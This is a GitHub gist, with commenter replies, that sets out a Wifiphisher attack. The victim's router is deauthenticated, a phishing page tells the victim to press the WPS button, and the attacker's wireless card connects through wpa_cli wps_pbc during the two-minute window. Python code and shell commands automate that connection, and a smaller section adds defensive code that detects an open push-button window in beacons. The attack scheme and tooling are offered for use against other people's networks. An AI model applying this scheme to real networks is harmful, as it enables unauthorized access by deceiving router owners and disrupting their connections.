@Splinter0
Last active March 19, 2017 13:36
WPS push button research for Wifiphisher

Scheme for the WPS button attack

Using 2 wireless cards

1. Set up everything as usual.
2. The victim sees the template that has a "continue" button; that button sends a POST request that starts the whole process. We use this because we can't start the process any other way with only 2 wireless cards.
3. In a thread we have a listener waiting for that POST request, which starts everything.

The process

4. The message to push the button appears on the victim's screen while we stop the deauth and set up wpa_cli on the same wireless card.
5. We wait 2 mins (wps_pbc is activated for 2 mins from when the button is pressed, on all routers), trying to connect to the AP while we keep scanning to see if the AP channel is still the same.
6. If we are not connected, the interface goes back to deauthenticating the target; otherwise we are done.

Problems

What if the victim resets the router instead of pressing the WPS button?

- It doesn't really matter, because after those two minutes the interface goes back to deauth; but before that it does a scan searching for our target (using the BSSID) and updates the deauth with the new channel (after the victim restarts the router the channel changes) to make sure the deauth restarts properly.
- Then it restarts everything again: wait for the user to press continue, stop the deauth, check for 2 mins whether it's connected, and so on.

Why do we need the "continue" button?

- Since we only have 2 wireless interfaces, we need to know when to switch to deauth and when to start listening for the WPS connection. (Everything will be clearer when the HTML is done.)

```python
import subprocess

"""
Automatic WPS connection with push button
Passing arguments: bssid and iface
"""


class WPS(object):
    def __init__(self, bssid, iface):
        self.bssid = bssid
        self.iface = iface
        self.conf_file = "/etc/wpa_supplicant.conf"  # wpa_supplicant config file

    def setup(self):
        """Write the config, start wpa_supplicant and start listening for wps_pbc"""
        # 'sudo echo ... > file' would do the redirection as the unprivileged user,
        # so the file is written by a shell that itself runs under sudo
        sup = ("sudo sh -c \"printf 'ctrl_interface=/var/run/wpa_supplicant\\n"
               "ctrl_interface_group=0\\nupdate_config=1\\n' > " + self.conf_file + "\"")
        wpa_set = "sudo wpa_supplicant -B -Dwext -i" + self.iface + " -c" + self.conf_file  # start wpa_supplicant
        iface_up = "sudo ifconfig " + self.iface + " up"  # sometimes the iface goes down after wpa_supplicant
        wpa_cli = "sudo wpa_cli -i " + self.iface + " wps_pbc " + self.bssid + " -B"  # start listening for wps_pbc
        # Launching the commands
        subprocess.call(sup, shell=True)
        subprocess.call(wpa_set, shell=True)
        subprocess.call(iface_up, shell=True)
        self.cli = subprocess.Popen(wpa_cli, shell=True, stdout=subprocess.PIPE,
                                    stdin=subprocess.PIPE, stderr=subprocess.PIPE)

    def dest(self):
        """Disconnecting from the AP: remove the config, bounce the interface, stop wpa_supplicant"""
        rm = "sudo rm " + self.conf_file
        iface_dw = "sudo ifconfig " + self.iface + " down"
        iface_up = "sudo ifconfig " + self.iface + " up"
        wpa = "sudo killall wpa_supplicant"  # wpa_supplicant runs as root, so killall needs sudo too
        subprocess.call(rm, shell=True)
        subprocess.call(iface_dw, shell=True)
        subprocess.call(iface_up, shell=True)
        subprocess.call(wpa, shell=True)


if __name__ == "__main__":
    wp = WPS("28:c6:8e:7d:51:d3", "wlan1")
    wp.dest()
```

How the push button actually works:

Push-button configuration (PBC): in some Wi-Fi Protected Setup networks, the user may connect multiple devices to the network and enable data encryption by pushing a button. The access point/wireless router will have a physical button, and other devices may have a physical or software-based button. Users should be aware that during the two-minute setup period which follows the push of the button, unintended devices could join the network if they are in range.

source
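As an added example from the defender's side (not code from this gist or from Wifiphisher): an administrator can tell whether an AP is currently advertising that two-minute PBC window by decoding the WPS vendor-specific information element in its beacons, where the Selected Registrar and Device Password ID attributes flag an open push-button registrar. The attribute IDs are from the Wi-Fi Simple Configuration specification; the two sample IEs are constructed here, not captured from a real AP.

```python
import struct

# A WPS IE is a vendor-specific element (ID 0xDD) with OUI 00:50:F2 and type 4,
# followed by WSC attributes as big-endian TLVs: 2-byte id, 2-byte length, value.
VENDOR_SPECIFIC_IE = 0xDD
WPS_OUI_TYPE = b"\x00\x50\xf2\x04"
ATTR_VERSION = 0x104A
ATTR_WPS_STATE = 0x1044
ATTR_SELECTED_REGISTRAR = 0x1041
ATTR_DEVICE_PASSWORD_ID = 0x1012
ATTR_SEL_REG_CONFIG_METHODS = 0x1053
DPID_PUSHBUTTON = 0x0004            # Device Password ID value meaning PBC
CONFIG_METHOD_PUSHBUTTON = 0x0080   # PushButton bit in Config Methods

def parse_wps_ie(ie):
    """Return {attr_id: value_bytes} for a WPS vendor IE, or None if it is not one."""
    if len(ie) < 6 or ie[0] != VENDOR_SPECIFIC_IE or ie[2:6] != WPS_OUI_TYPE:
        return None
    body = ie[6:2 + ie[1]]
    attrs, pos = {}, 0
    while pos + 4 <= len(body):
        attr_id, length = struct.unpack(">HH", body[pos:pos + 4])
        value = body[pos + 4:pos + 4 + length]
        if len(value) != length:  # truncated attribute: stop rather than misread it
            break
        attrs[attr_id] = value
        pos += 4 + length
    return attrs

def pbc_window_open(attrs):
    """True when the AP advertises an active push-button registrar, i.e. the 2-minute window."""
    selected = attrs.get(ATTR_SELECTED_REGISTRAR) == b"\x01"
    dpid = struct.unpack(">H", attrs.get(ATTR_DEVICE_PASSWORD_ID, b"\x00\x00"))[0]
    methods = struct.unpack(">H", attrs.get(ATTR_SEL_REG_CONFIG_METHODS, b"\x00\x00"))[0]
    return selected and (dpid == DPID_PUSHBUTTON or bool(methods & CONFIG_METHOD_PUSHBUTTON))

def build_ie(attrs):
    """Helper to assemble a WPS IE from {attr_id: bytes}; used only to construct the samples."""
    body = b"".join(struct.pack(">HH", a, len(v)) + v for a, v in attrs.items())
    return bytes([VENDOR_SPECIFIC_IE, len(WPS_OUI_TYPE) + len(body)]) + WPS_OUI_TYPE + body

# Constructed sample IEs (not captured traffic): an AP whose PBC window is open,
# and a configured AP whose WPS is idle.
PBC_ACTIVE_IE = build_ie({ATTR_VERSION: b"\x10", ATTR_WPS_STATE: b"\x02",
                          ATTR_SELECTED_REGISTRAR: b"\x01", ATTR_DEVICE_PASSWORD_ID: b"\x00\x04",
                          ATTR_SEL_REG_CONFIG_METHODS: b"\x00\x80"})
WPS_IDLE_IE = build_ie({ATTR_VERSION: b"\x10", ATTR_WPS_STATE: b"\x02", ATTR_SELECTED_REGISTRAR: b"\x00"})
```

The bytes of a real IE can be taken from the vendor-specific elements a scan reports for your own AP; `pbc_window_open` returning true when nobody is deliberately enrolling a device is the signal that someone was talked into pressing the button.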

Single commands:

```sh
# write the wpa_supplicant config under sudo (a plain 'sudo echo ... > file' redirects as the unprivileged user)
sudo sh -c "printf 'ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1\n' > /etc/wpa_supplicant.conf"
sudo wpa_supplicant -B -Dwext -iwlan1 -c/etc/wpa_supplicant.conf
sudo ifconfig wlan1 up   # not always necessary (sometimes the iface goes down when starting wpa_supplicant)
sudo wpa_cli -i wlan1 wps_pbc 28:c6:8e:7d:51:d3 -B    # your AP's BSSID
```

Automated version:

Here is the script that automates the connection through wps_pbc: script

@Splinter0 (Author)

@JetseVerschuren it means the output will change on your AP (it's different on every AP, but the commands are the same).
Anyway, I tested all the commands and you can find a video with all the commands here:
Video

@laozi999 the way I wrote it

The target is selected and the new AP + deauth start

was just to speed it up; it meant it's a normal configuration with one interface for the AP and one for the deauth. Also, we don't need to keep scanning the channel; we can just scan it if the connection has failed, because otherwise we don't need it.
We need to know the new channel only if the router is reset, because if the victim presses the WPS button the attack is done and we don't need to deauth anymore.


Splinter0 commented Mar 18, 2017

@laozi999 anyway, I'm basically done automating the process that allows the WPS connection (it automates the commands I wrote in wps_push_button.md).
